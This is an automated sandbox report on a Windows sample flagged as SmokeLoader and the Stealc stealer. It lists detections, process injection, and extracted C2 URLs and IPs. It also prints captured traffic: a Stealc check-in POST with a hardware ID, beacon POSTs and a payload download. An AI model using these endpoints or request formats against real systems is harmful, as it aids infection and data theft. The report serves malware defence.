Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
oZB7n3wuNk.exe

Overview

General Information

Sample name:oZB7n3wuNk.exe
renamed because original name is a hash value
Original sample name:a4bc249dc997df25a0e709eee0a0df87.exe
Analysis ID:1502739
MD5:a4bc249dc997df25a0e709eee0a0df87
SHA1:d4bd3dcc3c5c1bed477f3eccbf1561b4c4f9180b
SHA256:f691d08d4d08a092f52d63eb5a5fce0cbdeeaa042c18282c73ac5ebb627c25d3
Tags:exe
Infos:

Detection

CryptOne, SmokeLoader, Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected CryptOne packer
Yara detected Powershell download and execute
Yara detected SmokeLoader
Yara detected Stealc
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Query firmware table information (likely to detect VMs)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • oZB7n3wuNk.exe (PID: 2996 cmdline: "C:\Users\user\Desktop\oZB7n3wuNk.exe" MD5: A4BC249DC997DF25A0E709EEE0A0DF87)
    • explorer.exe (PID: 4004 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • 9A25.exe (PID: 3500 cmdline: C:\Users\user\AppData\Local\Temp\9A25.exe MD5: 17D51083CCB2B20074B1DC2CAC5BEA36)
        • svchost015.exe (PID: 6812 cmdline: C:\Users\user\AppData\Local\Temp\svchost015.exe MD5: B826DD92D78EA2526E465A34324EBEEA)
      • WerFault.exe (PID: 5372 cmdline: C:\Windows\system32\WerFault.exe -u -p 4004 -s 9264 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • birajci (PID: 6596 cmdline: C:\Users\user\AppData\Roaming\birajci MD5: A4BC249DC997DF25A0E709EEE0A0DF87)
  • explorer.exe (PID: 4016 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://91.202.233.158/e96ea2db21fa9a1b.php"}
{"Version": 2022, "C2 list": ["http://epohe.ru/tmp/", "http://olihonols.in.net/tmp/", "http://nicetolosv.xyz/tmp/", "http://jftolsa.ws/tmp/"]}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\svchost015.exeJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
    C:\Users\user\AppData\Local\Temp\svchost015.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      SourceRuleDescriptionAuthorStrings
      00000006.00000002.2794045093.0000000003019000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_CryptYara detected CryptOne packerJoe Security
        00000004.00000002.2404618518.00000000006E8000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
        • 0x127b2:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
        00000000.00000002.2179135216.00000000007A0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          00000000.00000002.2179023216.0000000000638000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
          • 0x12c3a:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
          Click to see the 17 entries
          SourceRuleDescriptionAuthorStrings
          7.0.svchost015.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
            7.0.svchost015.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security

              System Summary

              barindex
              Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\birajci, CommandLine: C:\Users\user\AppData\Roaming\birajci, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\birajci, NewProcessName: C:\Users\user\AppData\Roaming\birajci, OriginalFileName: C:\Users\user\AppData\Roaming\birajci, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: C:\Users\user\AppData\Roaming\birajci, ProcessId: 6596, ProcessName: birajci
              Timestamp:2024-09-02T08:20:56.464489+0200
              SID:2039103
              Severity:1
              Source Port:49729
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:20:56.464489+0200
              SID:2851815
              Severity:1
              Source Port:49729
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:20:38.270691+0200
              SID:2039103
              Severity:1
              Source Port:49716
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:20:38.270691+0200
              SID:2851815
              Severity:1
              Source Port:49716
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:21:12.689150+0200
              SID:2039103
              Severity:1
              Source Port:49743
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:21:04.584929+0200
              SID:2039103
              Severity:1
              Source Port:49736
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:20:41.705004+0200
              SID:2039103
              Severity:1
              Source Port:49719
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:20:41.705004+0200
              SID:2851815
              Severity:1
              Source Port:49719
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:21:09.644123+0200
              SID:2039103
              Severity:1
              Source Port:49741
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:21:09.644123+0200
              SID:2851815
              Severity:1
              Source Port:49741
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:20:51.830169+0200
              SID:2039103
              Severity:1
              Source Port:49726
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:20:44.470379+0200
              SID:2039103
              Severity:1
              Source Port:49722
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:20:44.470379+0200
              SID:2851815
              Severity:1
              Source Port:49722
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:20:40.547489+0200
              SID:2039103
              Severity:1
              Source Port:49718
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:20:40.547489+0200
              SID:2851815
              Severity:1
              Source Port:49718
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:21:00.505655+0200
              SID:2039103
              Severity:1
              Source Port:49733
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:20:46.136287+0200
              SID:2039103
              Severity:1
              Source Port:49723
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:21:18.914730+0200
              SID:2039103
              Severity:1
              Source Port:49746
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:21:03.300496+0200
              SID:2039103
              Severity:1
              Source Port:49735
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:21:03.300496+0200
              SID:2851815
              Severity:1
              Source Port:49735
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:20:39.421290+0200
              SID:2039103
              Severity:1
              Source Port:49717
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:21:23.383253+0200
              SID:2044243
              Severity:1
              Source Port:49751
              Destination Port:80
              Protocol:TCP
              Classtype:Malware Command and Control Activity Detected
              Timestamp:2024-09-02T08:20:59.249947+0200
              SID:2039103
              Severity:1
              Source Port:49731
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:21:23.479496+0200
              SID:2039103
              Severity:1
              Source Port:49750
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:21:07.154202+0200
              SID:2039103
              Severity:1
              Source Port:49738
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:21:07.154202+0200
              SID:2851815
              Severity:1
              Source Port:49738
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:21:08.487207+0200
              SID:2039103
              Severity:1
              Source Port:49739
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:21:20.102228+0200
              SID:2039103
              Severity:1
              Source Port:49747
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:21:20.102228+0200
              SID:2851815
              Severity:1
              Source Port:49747
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:21:13.363565+0200
              SID:2019714
              Severity:2
              Source Port:49744
              Destination Port:443
              Protocol:TCP
              Classtype:Potentially Bad Traffic
              Timestamp:2024-09-02T08:20:53.004797+0200
              SID:2039103
              Severity:1
              Source Port:49727
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:20:55.344856+0200
              SID:2039103
              Severity:1
              Source Port:49728
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:21:17.770363+0200
              SID:2039103
              Severity:1
              Source Port:49745
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:20:50.182098+0200
              SID:2039103
              Severity:1
              Source Port:49725
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:20:42.946482+0200
              SID:2039103
              Severity:1
              Source Port:49720
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:20:42.946482+0200
              SID:2851815
              Severity:1
              Source Port:49720
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:20:49.004934+0200
              SID:2039103
              Severity:1
              Source Port:49724
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:20:57.633019+0200
              SID:2039103
              Severity:1
              Source Port:49730
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:21:11.300474+0200
              SID:2039103
              Severity:1
              Source Port:49742
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:21:22.026288+0200
              SID:2039103
              Severity:1
              Source Port:49748
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:21:22.026288+0200
              SID:2851815
              Severity:1
              Source Port:49748
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:21:05.996542+0200
              SID:2039103
              Severity:1
              Source Port:49737
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:2024-09-02T08:21:01.659763+0200
              SID:2039103
              Severity:1
              Source Port:49734
              Destination Port:80
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: http://91.202.233.158/e96ea2db21fa9a1b.phpFAvira URL Cloud: Label: malware
              Source: http://91.202.233.158/e96ea2db21fa9a1b.phpZAvira URL Cloud: Label: malware
              Source: http://91.202.233.158/e96ea2db21fa9a1b.phpOAvira URL Cloud: Label: malware
              Source: http://91.202.233.158/Avira URL Cloud: Label: malware
              Source: http://91.202.233.158/e96ea2db21fa9a1b.phpAvira URL Cloud: Label: malware
              Source: http://91.202.233.158Avira URL Cloud: Label: malware
              Source: http://91.202.233.158/e96ea2db21fa9a1b.php6Avira URL Cloud: Label: malware
              Source: http://91.202.233.158/e96ea2db21fa9a1b.php4Avira URL Cloud: Label: malware
              Source: http://91.202.233.158/e96ea2db21fa9a1b.phpwsAvira URL Cloud: Label: malware
              Source: http://91.202.233.158/wsAvira URL Cloud: Label: malware
              Source: http://91.202.233.158/e96ea2db21fa9a1b.php5d1ef941bc7800Avira URL Cloud: Label: malware
              Source: 00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://91.202.233.158/e96ea2db21fa9a1b.php"}
              Source: 00000000.00000002.2179176948.00000000007C0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://epohe.ru/tmp/", "http://olihonols.in.net/tmp/", "http://nicetolosv.xyz/tmp/", "http://jftolsa.ws/tmp/"]}
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeReversingLabs: Detection: 37%
              Source: C:\Users\user\AppData\Roaming\birajciReversingLabs: Detection: 63%
              Source: oZB7n3wuNk.exeReversingLabs: Detection: 63%
              Source: oZB7n3wuNk.exeVirustotal: Detection: 63%Perma Link
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Roaming\birajciJoe Sandbox ML: detected
              Source: oZB7n3wuNk.exeJoe Sandbox ML: detected
              Source: oZB7n3wuNk.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
              Source: unknownHTTPS traffic detected: 84.32.84.152:443 -> 192.168.2.6:49744 version: TLS 1.2

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49723 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49718 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.6:49718 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49725 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49722 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49719 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.6:49719 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49724 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49730 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49717 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49729 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49716 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.6:49716 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49720 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.6:49720 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49731 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49735 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.6:49735 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.6:49722 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49728 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49733 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49736 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49734 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49738 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49741 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.6:49741 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.6:49729 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.6:49738 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49739 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49742 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49743 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49726 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49727 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49737 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49745 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49748 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.6:49748 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49746 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49747 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2851815 - Severity 1 - ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 : 192.168.2.6:49747 -> 2.185.214.11:80
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49751 -> 91.202.233.158:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.6:49750 -> 2.185.214.11:80
              Source: C:\Windows\explorer.exeNetwork Connect: 84.32.84.152 443Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 2.185.214.11 80Jump to behavior
              Source: Malware configuration extractorURLs: http://91.202.233.158/e96ea2db21fa9a1b.php
              Source: Malware configuration extractorURLs: http://epohe.ru/tmp/
              Source: Malware configuration extractorURLs: http://olihonols.in.net/tmp/
              Source: Malware configuration extractorURLs: http://nicetolosv.xyz/tmp/
              Source: Malware configuration extractorURLs: http://jftolsa.ws/tmp/
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 91.202.233.158Connection: Keep-AliveCache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /e96ea2db21fa9a1b.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFIEGDAEHIEHIDHJDAAKHost: 91.202.233.158Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 47 44 41 45 48 49 45 48 49 44 48 4a 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 45 34 34 36 44 41 46 41 45 33 34 31 35 39 34 39 33 34 32 30 34 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 47 44 41 45 48 49 45 48 49 44 48 4a 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 47 44 41 45 48 49 45 48 49 44 48 4a 44 41 41 4b 2d 2d 0d 0a Data Ascii: ------CFIEGDAEHIEHIDHJDAAKContent-Disposition: form-data; name="hwid"7E446DAFAE341594934204------CFIEGDAEHIEHIDHJDAAKContent-Disposition: form-data; name="build"default------CFIEGDAEHIEHIDHJDAAK--
              Source: Joe Sandbox ViewASN Name: M247GB M247GB
              Source: Joe Sandbox ViewASN Name: NTT-LT-ASLT NTT-LT-ASLT
              Source: Joe Sandbox ViewASN Name: TCIIR TCIIR
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.6:49744 -> 84.32.84.152:443
              Source: global trafficHTTP traffic detected: GET /Coin.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.darkviolet-alpaca-923878.hostingersite.com
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fwivmymbxwb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: epohe.ru
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bvrcwhkhepnussxw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: epohe.ru
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bfuqgtbxdbrm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: epohe.ru
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nysunlaoxsnx.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: epohe.ru
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mngbwwbxxtu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: epohe.ru
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mtxcnwqijndc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 140Host: epohe.ru
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lbbemhvyacupfj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 160Host: epohe.ru
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pnkjbaopqllltj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: epohe.ru
              Source: global trafficHTTP traffic detected: POST /tmp/ HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xabepmucutwrclm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 224Host: epohe.ru
